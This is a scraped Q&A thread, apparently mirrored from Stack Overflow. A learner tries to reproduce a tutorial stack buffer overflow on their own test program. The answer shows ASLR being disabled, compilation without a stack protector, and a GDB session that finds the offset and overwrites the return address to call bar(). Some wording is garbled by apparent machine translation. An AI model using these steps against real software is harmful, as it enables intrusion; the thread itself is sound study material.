Geek Answers Handbook

How to check buffer overflow on a modern system?

I am now interested in learning how to perform buffer overflows. I made quite a few builds and realized how the stack works and how to implement buffer overflows in C. However, I ran into a rather difficult task trying to get GCC 4.9.1 to allow me to overflow the buffer correctly. I am running Debian Jessie.

Here is the tutorial I'm trying to complete, in section 2.2. I copied / pasted the C program that it provides, and I use the same Perl script that it is, so everything is exactly the same as its case (except for the system, of course).

These are the results that I get sequentially:

~/projects/buffer-overflow$ ls run.pl test.c ~/projects/buffer-overflow$ sudo su root@wash # echo "0" > /proc/sys/kernel/randomize_va_space root@wash # exit exit ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c ~/projects/buffer-overflow$ ./run.pl Address of foo = 0x804845b Address of bar = 0x80484a4 My stack looks like: (nil) 0xffffd4a8 0xf7e58b2f 0xf7fb3ac0 0x8048657 0xffffd494 ABCDEFGHIJKLMNOPP@ Now the stack looks like: 0xffffd718 0xffffd4a8 0xf7e58b2f 0xf7fb3ac0 0x42418657 0x46454443
+7
c gcc stack-overflow
source share
2 answers

Because the Perl script is not particularly useful here, different systems will use different addresses, so let's do it without a script ...

First of all, find the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:

 (gdb) run `perl -e 'print "A" x 26';` Address of foo = 0x804845b Address of bar = 0x80484a5 My stack looks like: 0xf7fb1000 0xffffdab8 0xf7e44476 0xf7fb1d60 0x8048647 0xffffdaa8 AAAAAAAAAAAAAAAAAAAAAAAAAA Now the stack looks like: 0xffffdcbb 0xffffdab8 0xf7e44476 0xf7fb1d60 0x41418647 0x41414141 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

As you can see, 26 bytes will overwrite EIP, therefore, replacing the last four characters "A" with our address bar () (do not forget to put it in a small terminal format), we should be successful

 (gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';` Address of foo = 0x804845b Address of bar = 0x80484a5 My stack looks like: 0xf7fb1000 0xffffdab8 0xf7e44476 0xf7fb1d60 0x8048647 0xffffdaa8 AAAAAAAAAAAAAAAAAAAAAA   Now the stack looks like: 0xffffdcbb 0xffffdab8 0xf7e44476 0xf7fb1d60 0x41418647 0x41414141 Augh! I've been hacked! Program received signal SIGSEGV, Segmentation fault. 0xffffdc06 in ?? ()

As you can see, we have successfully returned to the function line ().

+2
source share

I would try either -fno-stack-protector-all (adding -all ), and also -O ? options, some optimizations are included in some -fxxx .

0
source share

More articles:


All Articles